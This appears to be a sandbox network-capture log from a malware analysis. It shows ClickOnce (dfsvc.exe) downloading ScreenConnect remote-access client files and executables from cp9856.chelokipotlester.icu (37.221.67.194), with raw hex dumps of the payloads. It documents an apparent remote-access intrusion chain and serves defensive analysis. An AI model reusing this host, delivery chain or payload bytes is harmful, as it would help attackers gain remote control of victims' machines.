                                                                                                                                                                              2024-10-29 18:34:31 UTC16133INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                                                                              2024-10-29 18:34:31 UTC16384INData Raw: 39 73 55 47 46 75 5a 57 78 4a 52 48 4d 69 49 48 4e 6c 63 6d 6c 68 62 47 6c 36 5a 55 46 7a 50 53 4a 54 64 48 4a 70 62 6d 63 69 50 67 30 4b 49 43 41 67 49 43 41 67 50 48 5a 68 62 48 56 6c 50 6a 42 34 4d 44 41 77 4d 44 41 77 4d 44 45 31 4e 44 41 77 4d 44 41 78 4d 44 77 76 64 6d 46 73 64 57 55 2b 44 51 6f 67 49 43 41 67 50 43 39 7a 5a 58 52 30 61 57 35 6e 50 67 30 4b 49 43 41 67 49 44 78 7a 5a 58 52 30 61 57 35 6e 49 47 35 68 62 57 55 39 49 6b 31 6c 5a 58 52 70 62 6d 64 44 62 32 35 30 63 6d 39 73 55 47 46 75 5a 57 78 4a 52 48 4d 69 49 48 4e 6c 63 6d 6c 68 62 47 6c 36 5a 55 46 7a 50 53 4a 54 64 48 4a 70 62 6d 63 69 50 67 30 4b 49 43 41 67 49 43 41 67 50 48 5a 68 62 48 56 6c 50 6a 42 34 4d 44 41 77 4d 44 41 77 4d 44 45 31 4e 54 41 77 4d 44 41 77 4d 44 77 76 64
                                                                                                                                                                              Data Ascii: 9sUGFuZWxJRHMiIHNlcmlhbGl6ZUFzPSJTdHJpbmciPg0KICAgICAgPHZhbHVlPjB4MDAwMDAwMDE1NDAwMDAxMDwvdmFsdWU+DQogICAgPC9zZXR0aW5nPg0KICAgIDxzZXR0aW5nIG5hbWU9Ik1lZXRpbmdDb250cm9sUGFuZWxJRHMiIHNlcmlhbGl6ZUFzPSJTdHJpbmciPg0KICAgICAgPHZhbHVlPjB4MDAwMDAwMDE1NTAwMDAwMDwvd
                                                                                                                                                                              2024-10-29 18:34:31 UTC16384INData Raw: 38 41 62 51 42 74 41 47 45 41 62 67 42 6b 41 46 59 41 61 51 42 6b 41 47 55 41 62 77 42 53 41 47 55 41 59 77 42 76 41 48 49 41 5a 41 42 55 43 41 41 41 49 45 4d 41 62 77 42 74 41 47 30 41 59 51 42 75 41 47 51 41 56 67 42 70 41 47 51 41 5a 51 42 76 41 46 4d 41 64 41 42 76 41 48 41 41 58 41 67 41 41 44 68 44 41 47 38 41 62 67 42 7a 41 47 55 41 62 67 42 30 41 45 67 41 62 77 42 7a 41 48 51 41 51 77 42 76 41 47 34 41 63 77 42 6c 41 47 34 41 64 41 42 43 41 48 55 41 64 41 42 30 41 47 38 41 62 67 42 55 41 47 55 41 65 41 42 30 41 47 49 49 41 41 41 73 51 77 42 76 41 47 34 41 63 77 42 6c 41 47 34 41 64 41 42 49 41 47 38 41 63 77 42 30 41 45 77 41 59 51 42 69 41 47 55 41 62 41 42 47 41 47 38 41 63 67 42 74 41 47 45 41 64 41 42 32 43 41 41 41 4e 6b 4d 41 62 77 42 75 41
                                                                                                                                                                              Data Ascii: 8AbQBtAGEAbgBkAFYAaQBkAGUAbwBSAGUAYwBvAHIAZABUCAAAIEMAbwBtAG0AYQBuAGQAVgBpAGQAZQBvAFMAdABvAHAAXAgAADhDAG8AbgBzAGUAbgB0AEgAbwBzAHQAQwBvAG4AcwBlAG4AdABCAHUAdAB0AG8AbgBUAGUAeAB0AGIIAAAsQwBvAG4AcwBlAG4AdABIAG8AcwB0AEwAYQBiAGUAbABGAG8AcgBtAGEAdAB2CAAANkMAbwBuA
                                                                                                                                                                              2024-10-29 18:34:32 UTC16384INData Raw: 68 47 41 47 55 41 5a 51 42 6b 41 47 49 41 59 51 42 6a 41 47 73 41 51 77 42 76 41 47 30 41 62 51 42 6c 41 47 34 41 64 41 42 7a 41 45 6b 41 62 67 42 7a 41 48 51 41 63 67 42 31 41 47 4d 41 64 41 42 70 41 47 38 41 62 67 42 7a 41 43 77 6a 41 41 41 79 52 67 42 6c 41 47 55 41 5a 41 42 69 41 47 45 41 59 77 42 72 41 45 4d 41 62 77 42 74 41 47 30 41 5a 51 42 75 41 48 51 41 63 77 42 4d 41 47 45 41 59 67 42 6c 41 47 77 41 56 41 42 6c 41 48 67 41 64 41 42 2b 49 77 41 41 4c 6b 59 41 5a 51 42 6c 41 47 51 41 59 67 42 68 41 47 4d 41 61 77 42 45 41 47 6b 41 63 77 42 74 41 47 6b 41 63 77 42 7a 41 45 77 41 61 51 42 75 41 47 73 41 56 41 42 6c 41 48 67 41 64 41 43 66 49 77 41 41 4f 45 59 41 5a 51 42 6c 41 47 51 41 59 67 42 68 41 47 4d 41 61 77 42 46 41 47 30 41 59 51 42 70 41
                                                                                                                                                                              Data Ascii: hGAGUAZQBkAGIAYQBjAGsAQwBvAG0AbQBlAG4AdABzAEkAbgBzAHQAcgB1AGMAdABpAG8AbgBzACwjAAAyRgBlAGUAZABiAGEAYwBrAEMAbwBtAG0AZQBuAHQAcwBMAGEAYgBlAGwAVABlAHgAdAB+IwAALkYAZQBlAGQAYgBhAGMAawBEAGkAcwBtAGkAcwBzAEwAaQBuAGsAVABlAHgAdACfIwAAOEYAZQBlAGQAYgBhAGMAawBFAG0AYQBpA
                                                                                                                                                                              2024-10-29 18:34:32 UTC16384INData Raw: 4a 76 59 58 4a 6b 49 45 74 6c 65 58 4e 30 63 6d 39 72 5a 58 4d 42 44 30 4e 76 62 6e 52 79 62 32 77 67 55 32 68 68 63 6d 6c 75 5a 77 46 41 52 57 35 68 59 6d 78 6c 49 47 4e 73 61 58 42 69 62 32 46 79 5a 43 42 6f 5a 57 78 77 49 47 5a 76 63 69 42 30 61 47 55 67 53 47 56 73 63 47 56 79 49 48 52 76 49 48 42 79 62 32 4e 6c 63 33 4d 67 59 57 78 73 49 47 4e 76 63 47 6c 6c 5a 43 42 30 5a 58 68 30 4c 67 45 56 52 57 35 68 59 6d 78 6c 49 45 4e 73 61 58 42 69 62 32 46 79 5a 43 42 49 5a 57 78 77 41 51 70 46 63 33 4e 6c 62 6e 52 70 59 57 78 7a 41 51 31 47 61 57 78 6c 49 46 52 79 59 57 35 7a 5a 6d 56 79 41 51 5a 49 5a 57 78 77 5a 58 49 42 46 55 31 68 62 6d 46 6e 5a 53 42 44 59 58 42 30 64 58 4a 6c 49 45 5a 76 62 47 52 6c 63 67 45 31 55 33 52 76 63 6d 55 67 59 33 4a 6c 5a
                                                                                                                                                                              Data Ascii: JvYXJkIEtleXN0cm9rZXMBD0NvbnRyb2wgU2hhcmluZwFARW5hYmxlIGNsaXBib2FyZCBoZWxwIGZvciB0aGUgSGVscGVyIHRvIHByb2Nlc3MgYWxsIGNvcGllZCB0ZXh0LgEVRW5hYmxlIENsaXBib2FyZCBIZWxwAQpFc3NlbnRpYWxzAQ1GaWxlIFRyYW5zZmVyAQZIZWxwZXIBFU1hbmFnZSBDYXB0dXJlIEZvbGRlcgE1U3RvcmUgY3JlZ
                                                                                                                                                                              2024-10-29 18:34:32 UTC16384INData Raw: 6c 76 62 6d 55 42 48 30 52 76 62 69 64 30 49 47 46 73 62 47 39 33 49 47 4e 76 62 6e 52 79 62 32 77 67 5a 6e 4a 76 62 53 42 68 62 6e 6c 76 62 6d 55 42 44 45 46 77 63 47 78 70 59 32 46 30 61 57 39 75 4f 67 45 48 51 32 39 75 64 48 4a 76 62 41 45 49 54 57 39 75 61 58 52 76 63 6a 6f 42 43 30 31 76 62 6d 6c 30 62 33 49 67 65 7a 42 39 41 51 56 54 61 47 46 79 5a 51 45 55 65 7a 42 39 49 43 30 67 55 32 68 68 63 6d 56 6b 49 46 52 76 62 32 78 69 62 33 67 42 45 55 4e 76 62 6d 35 6c 59 33 52 70 62 32 34 67 55 33 52 68 64 48 56 7a 41 52 78 55 61 47 6c 7a 49 48 4e 6c 63 33 4e 70 62 32 34 67 61 58 4d 67 62 6d 39 30 49 47 56 73 5a 58 5a 68 64 47 56 6b 41 52 4a 4d 59 58 4e 30 49 45 56 79 63 6d 39 79 49 45 31 6c 63 33 4e 68 5a 32 55 42 45 55 31 6c 63 33 4e 68 5a 32 56 7a 49
                                                                                                                                                                              Data Ascii: lvbmUBH0Rvbid0IGFsbG93IGNvbnRyb2wgZnJvbSBhbnlvbmUBDEFwcGxpY2F0aW9uOgEHQ29udHJvbAEITW9uaXRvcjoBC01vbml0b3IgezB9AQVTaGFyZQEUezB9IC0gU2hhcmVkIFRvb2xib3gBEUNvbm5lY3Rpb24gU3RhdHVzARxUaGlzIHNlc3Npb24gaXMgbm90IGVsZXZhdGVkARJMYXN0IEVycm9yIE1lc3NhZ2UBEU1lc3NhZ2VzI
                                                                                                                                                                              2024-10-29 18:34:32 UTC16384INData Raw: 43 52 39 6f 36 34 65 31 53 73 6e 39 63 43 49 52 56 37 54 6e 43 66 56 37 47 4f 69 75 47 49 75 33 56 6a 44 4f 41 32 6f 51 46 73 6c 58 38 62 79 71 68 47 71 55 66 2f 39 69 45 4d 62 67 6f 63 48 64 6b 48 70 36 56 36 38 4b 75 6b 59 61 76 47 2b 78 44 62 43 72 75 75 76 69 56 57 52 35 74 2b 56 4a 66 37 4c 32 69 56 61 4d 49 74 67 67 46 32 39 46 67 57 42 72 49 45 2b 31 44 78 31 75 41 49 65 45 74 62 77 47 31 4f 75 6a 37 78 39 66 37 48 55 48 36 4a 73 68 74 68 6a 74 78 5a 58 68 4e 72 37 5a 6a 44 55 39 6f 35 75 50 6b 71 4e 6b 79 77 64 5a 73 79 56 69 32 39 47 4d 4f 6c 63 57 6c 38 6c 38 62 2f 41 4f 4e 33 5a 6c 33 36 62 33 6d 35 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 49 4f 6f 4a 41 41 43 4a 55 45 35 48 44 51 6f 61 43 67 41 41 41 41 31 4a 53 45 52 53 41 41 41 41 4c
                                                                                                                                                                              Data Ascii: CR9o64e1Ssn9cCIRV7TnCfV7GOiuGIu3VjDOA2oQFslX8byqhGqUf/9iEMbgocHdkHp6V68KukYavG+xDbCruuviVWR5t+VJf7L2iVaMItggF29FgWBrIE+1Dx1uAIeEtbwG1Ouj7x9f7HUH6JshthjtxZXhNr7ZjDU9o5uPkqNkywdZsyVi29GMOlcWl8l8b/AON3Zl36b3m5AAAAAElFTkSuQmCCIOoJAACJUE5HDQoaCgAAAA1JSERSAAAAL
                                                                                                                                                                              2024-10-29 18:34:32 UTC16384INData Raw: 32 35 72 34 6a 6b 54 79 33 6f 30 53 48 6c 6e 77 32 63 55 35 4a 41 51 4d 6b 43 47 57 2b 37 43 47 41 36 6d 6e 4d 6f 37 44 77 6c 61 72 57 74 64 56 75 35 62 4b 78 68 4e 68 32 71 42 4e 43 33 68 4d 53 41 56 49 77 4d 78 52 4d 59 36 44 6d 64 42 32 5a 62 37 4b 35 58 76 4a 35 4d 6a 6f 4c 33 2b 4b 63 59 30 49 4f 4e 7a 4a 65 6b 56 45 42 55 6a 43 30 6a 77 73 75 52 59 4b 5a 6b 4a 62 31 4f 72 63 6e 65 68 63 54 78 4f 54 65 54 42 64 57 41 67 59 49 4b 74 46 61 4c 6c 74 59 49 72 51 64 74 53 64 6a 78 54 74 2b 55 62 55 6f 6b 33 39 65 35 6b 47 62 55 54 41 67 79 43 41 54 41 6d 6f 41 46 73 58 6f 65 57 32 67 66 65 78 6e 32 6e 32 4b 68 4e 54 61 38 71 74 6d 30 6d 44 32 51 51 32 49 75 42 77 71 47 32 56 65 41 71 51 6a 4a 36 4b 62 57 41 47 59 68 6d 32 62 37 64 6f 64 6c 55 5a 53 59 4e
                                                                                                                                                                              Data Ascii: 25r4jkTy3o0SHlnw2cU5JAQMkCGW+7CGA6mnMo7DwlarWtdVu5bKxhNh2qBNC3hMSAVIwMxRMY6DmdB2Zb7K5XvJ5MjoL3+KcY0IONzJekVEBUjC0jwsuRYKZkJb1OrcnehcTxOTeTBdWAgYIKtFaLltYIrQdtSdjxTt+UbUok39e5kGbUTAgyCATAmoAFsXoeW2gfexn2n2KhNTa8qtm0mD2QQ2IuBwqG2VeAqQjJ6KbWAGYhm2b7dodlUZSYN
                                                                                                                                                                              2024-10-29 18:34:32 UTC13303INData Raw: 44 51 73 41 68 6c 58 54 54 7a 75 44 36 79 67 64 42 66 43 68 63 67 41 2f 37 50 4b 6d 65 63 6f 6b 45 67 42 6b 70 74 38 47 48 59 34 43 6c 77 6a 67 51 62 30 7a 45 4d 42 4d 49 67 46 41 64 73 31 63 61 39 43 54 42 50 43 41 31 73 63 4e 42 48 41 34 69 55 51 62 46 67 41 4d 70 35 31 44 33 48 56 47 67 52 63 49 59 4f 4d 2f 41 58 63 50 59 43 61 52 41 43 43 7a 65 67 35 78 5a 32 38 55 32 45 38 41 62 35 73 49 34 48 41 53 69 63 38 51 41 41 79 6c 6d 6b 50 63 42 65 73 6f 39 77 6c 67 30 31 50 41 56 77 58 77 4e 47 31 59 41 4a 42 56 6d 6d 73 4e 32 73 67 6f 73 4a 73 41 31 70 34 43 76 69 71 41 37 39 47 47 42 51 42 5a 72 65 61 51 64 30 45 62 31 6e 73 43 32 50 49 51 30 6c 55 42 54 42 73 57 41 47 53 57 52 78 64 57 79 64 6f 6f 38 41 30 71 30 41 4d 47 4d 47 31 59 41 4a 44 56 53 68 36
                                                                                                                                                                              Data Ascii: DQsAhlXTTzuD6ygdBfChcgA/7PKmecokEgBkpt8GHY4ClwjgQb0zEMBMIgFAds1ca9CTBPCA1scNBHA4iUQbFgAMp51D3HVGgRcIYOM/AXcPYCaRACCzeg5xZ28U2E8Ab5sI4HASic8QAAylmkPcBeso9wlg01PAVwXwNG1YAJBVmmsN2sgosJsA1p4CviqA79GGBQBZreaQd0Eb1nsC2PIQ0lUBTBsWAGSWRxdWydoo8A0q0AMGMG1YAJDVSh6


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.164971637.221.67.194437692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:34:33 UTC109OUTGET /Bin/ScreenConnect.Client.manifest HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-10-29 18:34:34 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 17866
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:34:33 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:34:34 UTC16168INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv
                                                                                                                                                                              2024-10-29 18:34:34 UTC1698INData Raw: 32 71 32 41 53 34 2b 6a 57 75 66 63 78 34 64 79 74 35 42 69 67 32 4d 45 6a 52 30 65 7a 6f 51 39 75 6f 36 74 74 6d 41 61 44 47 37 64 71 5a 79 33 53 76 55 51 61 6b 68 43 42 6a 37 41 37 43 64 66 48 6d 7a 4a 61 77 76 39 71 59 46 53 4c 53 63 47 54 37 65 47 30 58 4f 42 76 36 79 62 35 6a 4e 57 79 2b 54 67 51 35 75 72 4f 6b 66 57 2b 30 2f 74 76 6b 32 45 30 58 4c 79 54 52 53 69 44 4e 69 70 6d 4b 46 2b 77 63 38 36 4c 4a 69 55 47 73 6f 50 55 58 50 59 56 47 55 7a 74 59 75 42 65 4d 2f 4c 6f 36 4f 77 4b 70 37 41 44 4b 35 47 79 4e 6e 6d 2b 39 36 30 49 48 6e 57 6d 5a 63 79 37 34 30 68 51 38 33 65 52 47 76 37 62 55 4b 4a 47 79 47 46 59 6d 50 56 38 41 68 59 38 67 79 69 74 4f 59 62 73 31 4c 63 4e 55 39 44 34 52 2b 5a 31 4d 49 33 73 4d 4a 4e 32 46 4b 5a 62 53 31 31 30 59 55
                                                                                                                                                                              Data Ascii: 2q2AS4+jWufcx4dyt5Big2MEjR0ezoQ9uo6ttmAaDG7dqZy3SvUQakhCBj7A7CdfHmzJawv9qYFSLScGT7eG0XOBv6yb5jNWy+TgQ5urOkfW+0/tvk2E0XLyTRSiDNipmKF+wc86LJiUGsoPUXPYVGUztYuBeM/Lo6OwKp7ADK5GyNnm+960IHnWmZcy740hQ83eRGv7bUKJGyGFYmPV8AhY8gyitOYbs1LcNU9D4R+Z1MI3sMJN2FKZbS110YU


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.164972137.221.67.194437692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:34:42 UTC135OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-29 18:34:42 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 95520
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:34:42 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:34:42 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                                                                              2024-10-29 18:34:42 UTC16384INData Raw: 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e4 d0 40 00 5e 5d c3 55 8b ec 56 68 90 dd 40 00 68 88 dd 40 00 68 90 dd 40 00 6a 03 e8 4a fe ff ff 83 c4 10 8b f0 ff 75 0c ff 75 08 85 f6 74 0c 8b ce ff 15 88 d1 40 00 ff d6 eb 06 ff 15 e8 d0 40 00 5e 5d c3 55 8b ec 56 68 a4 dd 40 00 68 9c dd 40 00 68 a4 dd 40 00 6a 04 e8 0c fe ff ff 8b f0 83 c4 10 85 f6 74 15 ff 75 10 8b ce ff 75 0c ff 75 08 ff 15 88 d1 40 00 ff d6 eb 0c ff 75 0c ff 75 08 ff 15 60 d0 40 00 5e 5d c3 56 e8 56 ed ff ff 8b 70 04 85 f6 74 0a 8b ce ff 15 88 d1 40 00 ff d6 e8 de 15 00 00 cc 55 8b ec 8b 45 10 8b 4d 08 81 78 04 80 00 00 00 7f 06 0f be 41 08 5d c3 8b 41 08 5d c3 55 8b ec 8b 45 08 8b 4d 10 89 48 08 5d c3 53 51 bb 30 40 41 00 e9 0f 00 00 00 cc cc cc cc 53 51 bb 30 40 41 00
                                                                                                                                                                              Data Ascii: ut@@^]UVh@h@h@jJuut@@^]UVh@h@h@jtuuu@uu`@^]VVpt@UEMxA]A]UEMH]SQ0@ASQ0@A
                                                                                                                                                                              2024-10-29 18:34:42 UTC16384INData Raw: ff 01 8b 88 80 00 00 00 85 c9 74 03 f0 ff 01 8b 88 8c 00 00 00 85 c9 74 03 f0 ff 01 56 6a 06 8d 48 28 5e 81 79 f8 38 46 41 00 74 09 8b 11 85 d2 74 03 f0 ff 02 83 79 f4 00 74 0a 8b 51 fc 85 d2 74 03 f0 ff 02 83 c1 10 83 ee 01 75 d6 ff b0 9c 00 00 00 e8 4e 01 00 00 59 5e 5d c3 8b ff 55 8b ec 51 53 56 8b 75 08 57 8b 86 88 00 00 00 85 c0 74 6c 3d 48 46 41 00 74 65 8b 46 7c 85 c0 74 5e 83 38 00 75 59 8b 86 84 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 30 d9 ff ff ff b6 88 00 00 00 e8 28 fb ff ff 59 59 8b 86 80 00 00 00 85 c0 74 18 83 38 00 75 13 50 e8 0e d9 ff ff ff b6 88 00 00 00 e8 04 fc ff ff 59 59 ff 76 7c e8 f9 d8 ff ff ff b6 88 00 00 00 e8 ee d8 ff ff 59 59 8b 86 8c 00 00 00 85 c0 74 45 83 38 00 75 40 8b 86 90 00 00 00 2d fe 00 00 00 50 e8 cc d8 ff ff 8b
                                                                                                                                                                              Data Ascii: ttVjH(^y8FAttytQtuNY^]UQSVuWtl=HFAteF|t^8uYt8uP0(YYt8uPYYv|YYtE8u@-P
                                                                                                                                                                              2024-10-29 18:34:42 UTC16384INData Raw: fe 72 09 8b 48 08 03 ce 3b f9 72 0a 42 83 c0 28 3b d3 72 e8 33 c0 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a fe 68 20 2e 41 00 68 80 36 40 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 04 40 41 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 89 65 e8 c7 45 fc 00 00 00 00 68 00 00 40 00 e8 7c 00 00 00 83 c4 04 85 c0 74 54 8b 45 08 2d 00 00 40 00 50 68 00 00 40 00 e8 52 ff ff ff 83 c4 08 85 c0 74 3a 8b 40 24 c1 e8 1f f7 d0 83 e0 01 c7 45 fc fe ff ff ff 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 33 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc 55 8b ec 8b 45 08 b9 4d 5a 00 00 66 39 08 75 1d 8b 48 3c 03 c8 81 39
                                                                                                                                                                              Data Ascii: rH;rB(;r3_^[]Ujh .Ah6@dPSVW@A1E3PEdeEh@|tTE-@Ph@Rt:@$EMdY_^[]E38eE3MdY_^[]UEMZf9uH<9
                                                                                                                                                                              2024-10-29 18:34:43 UTC16384INData Raw: 64 00 65 00 2d 00 61 00 74 00 00 00 64 00 65 00 2d 00 63 00 68 00 00 00 64 00 65 00 2d 00 64 00 65 00 00 00 64 00 65 00 2d 00 6c 00 69 00 00 00 64 00 65 00 2d 00 6c 00 75 00 00 00 64 00 69 00 76 00 2d 00 6d 00 76 00 00 00 00 00 65 00 6c 00 2d 00 67 00 72 00 00 00 65 00 6e 00 2d 00 61 00 75 00 00 00 65 00 6e 00 2d 00 62 00 7a 00 00 00 65 00 6e 00 2d 00 63 00 61 00 00 00 65 00 6e 00 2d 00 63 00 62 00 00 00 65 00 6e 00 2d 00 67 00 62 00 00 00 65 00 6e 00 2d 00 69 00 65 00 00 00 65 00 6e 00 2d 00 6a 00 6d 00 00 00 65 00 6e 00 2d 00 6e 00 7a 00 00 00 65 00 6e 00 2d 00 70 00 68 00 00 00 65 00 6e 00 2d 00 74 00 74 00 00 00 65 00 6e 00 2d 00 75 00 73 00 00 00 65 00 6e 00 2d 00 7a 00 61 00 00 00 65 00 6e 00 2d 00 7a 00 77 00 00 00 65 00 73 00 2d 00 61 00 72 00 00
                                                                                                                                                                              Data Ascii: de-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ar
                                                                                                                                                                              2024-10-29 18:34:43 UTC13816INData Raw: 1f 33 30 33 9a 33 a1 33 b3 33 bc 33 04 34 16 34 1e 34 28 34 31 34 42 34 54 34 6f 34 af 34 c1 34 c7 34 db 34 2f 35 39 35 3f 35 45 35 b0 35 b9 35 f2 35 fd 35 f2 37 25 38 2a 38 50 39 68 39 95 39 b0 39 c0 39 c5 39 cf 39 d4 39 df 39 ea 39 fe 39 4f 3a f6 3a 17 3b 70 3b 7b 3b ca 3b e2 3b 2c 3c c2 3c d9 3c 57 3d 9b 3d ad 3d e3 3d e8 3d f5 3d 01 3e 17 3e 2a 3e 5d 3e 6c 3e 71 3e 82 3e 88 3e 93 3e 9b 3e a6 3e ac 3e b7 3e bd 3e cb 3e d4 3e d9 3e e6 3e eb 3e f8 3e 06 3f 0d 3f 15 3f 2e 3f 40 3f 4c 3f 54 3f 6c 3f 91 3f a2 3f ab 3f f2 3f 00 60 00 00 18 01 00 00 26 30 4d 30 67 30 be 30 cb 30 d6 30 e0 30 e6 30 fa 30 06 31 7f 31 88 31 b4 31 bd 31 c5 31 e2 31 07 32 19 32 35 32 59 32 74 32 7f 32 25 33 d8 33 e1 33 e9 33 04 35 0a 35 1c 35 2f 35 7f 35 b0 35 e0 35 2b 36 27 37 3b
                                                                                                                                                                              Data Ascii: 3033333444(414B4T4o44444/595?5E555557%8*8P9h9999999999O::;p;{;;;,<<<W======>>*>]>l>q>>>>>>>>>>>>>>>???.?@?L?T?l?????`&0M0g000000011111112252Y2t22%3333555/5555+6'7;


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.164972237.221.67.194437692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:34:44 UTC143OUTGET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-29 18:34:44 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
